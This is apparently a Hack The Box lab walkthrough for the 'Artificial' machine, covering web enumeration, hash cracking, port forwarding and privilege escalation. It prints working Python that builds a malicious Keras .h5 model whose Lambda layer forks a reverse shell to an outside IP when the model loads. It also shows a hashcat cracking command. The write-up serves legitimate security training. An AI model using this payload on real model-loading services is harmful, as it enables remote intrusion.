HTB - Artificial (Linux/Easy)

Seasonal Machine - Week 6 [Season 8]

Ports & Services Scanning

Command: sudo nmap 10.10.11.74 -sC -sV -v

Port 22 is not accessible without credentials. So, proceeding with WEB ENUMERATION

Web Enumeration

Add artificial.htb in /etc/hosts to access the application

Accessing the application, I found login & register pages. So, to access the application, create an account and logged into the application.

I found a file upload functionality, but it accepts model files with extensions .h5. Tried making custom .h5 files with malicious codes but there is no way to execute them.

After some research, I found out that malicious ML model files exist. [Click Me]

Now, I need to create a model file, but there are some requirements given. I proceeded with the Dockerfile.

Created a ML model file with reverse shell inside.

The shellcode generates a reverse shell as an independent process. As, the model file halts once the prediction is over. So, to maintain persistence it must be executed as an independent process.

from tensorflow import keras
from tensorflow.keras import layers

def malicious_runtime(x):
    exec("""
import os, socket, subprocess

def reverse_shell():
    s = socket.socket()
    s.connect(("10.10.16.21", 9999))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call(["/bin/bash"])

pid = os.fork()
if pid == 0:
    reverse_shell()
""")
    return x

model = keras.Sequential([
    layers.Input(shape=(1,)),
    layers.Lambda(malicious_runtime),
    layers.Dense(1)
])

model.compile(optimizer="adam", loss="mse")
model.save("malicious_model.h5")
print("✅ Malicious model saved without triggering payload")

Upload the model and execute the prediction function

The function loads the model for prediction, as soon as the model loads into the system, the malicious code inside the model files executes and gives RCE.

The current user does not have the user flag. So, I need to find ways to login as gael as that is the only account available other than app. So, gael should have the user flag.

Lateral Movement

Enumerating current user with linpeas, I found a database file '/home/app/app/instance/users.db' which seems promising.

Downloaded the file to my machine, I found user table containing password hashes. Also, there is a hash for user gael, who is a user in the system. It is possible that the password is reused. So, cracked the hash and proceeded to login with the password.

User Flag Retrieved

The password worked and I got access as gael and retrieved the user flag.

Also, the user is in a group 'sysadm'. So, it can help me to escalate my privilege to root.

Privilege Escalation

Once again, downloaded linpeas from my machine to attacker machine to further enumerate the machine.

Enumerating the result, I found a backup file (/var/backups/backrest_backup.tar.gz) that seems promising, and it is readable by sysadm group users.

Downloaded the file to my machine and analyzed it. Inside the backup file, there is a config file which had the credentials for a user.

The hash is base64 encoded. So, first I decoded it and then cracked it using hashcat.

Command: hashcat --potfile-disable -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Then, tried to login as root using the password but did not work. So, it is clear that this credential is for something else.

Checked for active network connections and found that port 9898 is listening for incoming connections. But this is not public.

Local Port Forwarding

The credentials worked and I logged into the application.

Exploring the application, I found ways to execute scripts. And the thing is it executes the commands as root.

So, crafted another script for reverse shell, and it gave the reverse shell as root.

Root Flag Retrieved